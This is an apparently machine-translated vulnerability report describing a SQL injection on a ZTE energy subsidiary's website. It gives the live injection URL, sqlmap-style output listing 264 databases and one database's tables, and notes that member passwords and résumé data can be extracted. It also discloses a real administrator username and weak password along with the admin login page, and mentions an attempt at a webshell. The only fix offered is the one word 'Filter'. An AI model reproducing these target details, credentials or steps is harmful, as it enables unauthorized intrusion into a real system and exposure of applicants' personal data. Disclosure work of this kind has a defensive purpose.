SQL Injection at a station of ZTE causes a large amount of information leakage

SQL Injection at a station of ZTE causes a large amount of information leakage

Information leakage caused by SQL injection at a station of ZTE

ZTE energy

Http://www.zte-e.com/

Injection Point (search page, other page parameters are converted by type, I thought there was no hope, but I found that the search page entered 'an error, the error page shows that the search keyword is not processed. The input type and special characters are displayed ):

Http://www.zte-e.com/cn/Search.aspx? Keyword ='



A total of 264 Databases

web server operating system: Windowsweb application technology: ASP.NET 0back-end DBMS: Microsoft SQL Server 2000available databases [264]:[*] 112233a[*] 123123[*] 123456[*] 123456789[*] 456789[*] adkin66[*] agcom12[*] agronc78[*] aibj789[*] anchic6[*] anco78[*] andfi78[*] atm188[*] aucma001[*] auto66[*] baicyx66[*] bami58[*] bbeon1[*] bbzegs55[*] bdzy70[*] beiji89[*] beijing7[*] besaf55[*] bfguo21[*] bgilt635[*] big64[*] bjbam35[*] bjbio87[*] bjclp5[*] bjdi46[*] bjfe49[*] bjjd665[*] bjjrb[*] bjkdlc1[*] bjkjx1[*] bjmsi02[*] bjrel59[*] bjrenhu7[*] bjrtac23[*] bjsrin12[*] bjsy43[*] bjtddc[*] bjucc11[*] bjw45[*] bjxst74[*] bjzh76[*] blac68[*] blue43[*] buka69[*] chinabei8[*] chinagz7[*] chinar1[*] chnw86[*] chunaifs[*] clorgcn1[*] cnliso21[*] cnnc66[*] coat21[*] comfjzy88[*] commxtx2[*] const49[*] coomexc6[*] cqxdx[*] csrs58[*] culture36[*] cyph66[*] daki15[*] dengm21[*] digibm21[*] dlhold56[*] donghuimuye[*] dqbe21[*] dsbncm1[*] dyer23[*] eduam12[*] emp975[*] expat1[*] expo26[*] fanyoo89[*] fdzd21[*] feng89[*] fgnmining1[*] fjjhep1om[*] fjjinuo1[*] fl5674[*] flgt96[*] gdlccom1[*] gemop89[*] gene54[*] gfedc659[*] great66[*] gree46[*] gree55[*] gsk1[*] gws1necn[*] gwsj76[*] gzjz46[*] hain72[*] haixin13[*] hama13[*] heaven1[*] high88[*] hikag54[*] hlftsb1[*] hntd001[*] hobbe8[*] hongs23[*] hongyi21[*] hotgen13[*] htyq8[*] hua369[*] huabjy1[*] huad19[*] huaf59[*] huafeng123[*] huanzh7[*] huat16[*] huaxia5[*] huaxing9[*] hugeca1[*] hxdy31[*] hyfl978[*] hytctech3[*] inageweb8[*] ind49[*] inox45[*] insm49[*] it05982013[*] jiagu56[*] jinc29[*] jiudia12[*] jnbw84[*] jsyinu67[*] jydi59[*] jyys74[*] kaip698[*] kanglian81[*] kinn46[*] kreaci75[*] land2[*] leim29[*] lhq555[*] lmes87[*] lookstee01[*] lxc574[*] master[*] matri66[*] meikub6[*] mjbjdbsc8[*] model[*] msdb[*] mxx96[*] neoen9[*] northstar3[*] Northwind[*] nunufo44[*] oasisligh[*] offic43[*] office96[*] orac56[*] ork79[*] picarr12[*] pion56[*] pride88[*] prosyn86[*] pubs[*] qbf123[*] qbfaaa[*] reac43[*] read56[*] read66[*] resi46[*] royalrb7[*] rstests[*] rui78[*] sanb48[*] sani75[*] sbc26[*] scil16[*] sczw[*] sdsj2012[*] sdzkf76[*] sdzlhot7[*] season85[*] shangb9[*] shenh21[*] shida12[*] shun94[*] silkr59[*] singbt10[*] sisulanf5[*] sma1om[*] smjmw[*] spainto2[*] splendor[*] sxcc[*] sxss49[*] sxxjdcygl[*] tai76[*] tarcin23[*] tczy8[*] tdhp19[*] tempdb[*] throu79[*] tht66[*] tiantra21[*] tim66[*] tjsjgwy8[*] tjsvw[*] toyojishop[*] tria90[*] truthpro8[*] tyre69[*] tyz946[*] tzm569[*] waimai662[*] whir49[*] whxj86[*] winstm21[*] winstr66[*] winsu85[*] wisvid1[*] wohu58[*] wohu59[*] wohu86[*] wonom21[*] wq5dcost[*] wtnom1[*] wxx45[*] xiang66[*] xingyuan8[*] xion66[*] xito28[*] xsdt123[*] xudanbo[*] xune49[*] xushwebk[*] xuze73[*] yanbet21[*] yolo43[*] yqrms78[*] yrjt28[*] ysjl19[*] ytou46[*] yuexin5[*] yunguist1[*] yunz32[*] yuyuy54[*] ywc84[*] zcl84[*] zgdlcn122[*] zglawye7[*] zgsh43[*] zgxy2012[*] zhsof30[*] zika79[*] zjli42[*] zkpjweb[*] zsclbm1[*] zte1314[*] ztgz46[*] zwcnhj12[*] zwgl03[*] zzyc48

Select zte1314 library to obtain the table

web server operating system: Windowsweb application technology: ASP.NET 0back-end DBMS: Microsoft SQL Server 2000Database: zte1314[37 tables]+------------------------+| sysconstraints         || syssegments            || zte1314.ApplyJob       || zte1314.CityAndCountry || zte1314.Cls_Class      || zte1314.Col_News       || zte1314.Company        || zte1314.Dyue           || zte1314.Eexperience    || zte1314.GuestBook      || zte1314.JianLi         || zte1314.Link           || zte1314.Link_Class     || zte1314.LockAdminIP    || zte1314.LogLogin       || zte1314.Mail           || zte1314.Mail_Model     || zte1314.Main_Menu      || zte1314.Member         || zte1314.News_News      || zte1314.Note           || zte1314.Ord            || zte1314.PList          || zte1314.S_Menu         || zte1314.S_Model        || zte1314.SysA_Admin     || zte1314.SysP_Possrss   || zte1314.UploadFiles    || zte1314.UseSoft        || zte1314.WebInfo        || zte1314.Wexperience    || zte1314.ZLanguage      || zte1314.ask            || zte1314.jobnew         || zte1314.pic            || zte1314.userpay        || zte1314.vote           |+------------------------+

You can use zte1314.Member to obtain the username and password of a member. You can view your resume on the job, including your account, password, name, email address, mobile phone number, salary, and address...

You can modify your resume using your account and password.



You can directly click log on to view details ....
 

 

 

 

Obtain the administrator username and password in the zte1314.SysA _ Admin table.

Weak background password of the Administrator account

liming/123123

Login background http://www.zte-e.com/manage/AdminLogin.aspx
 

Funny thing is, the link of ZTE is not an official link...



Because the upload access permission is blocked, webshell cannot be obtained.
 

Solution:

Filter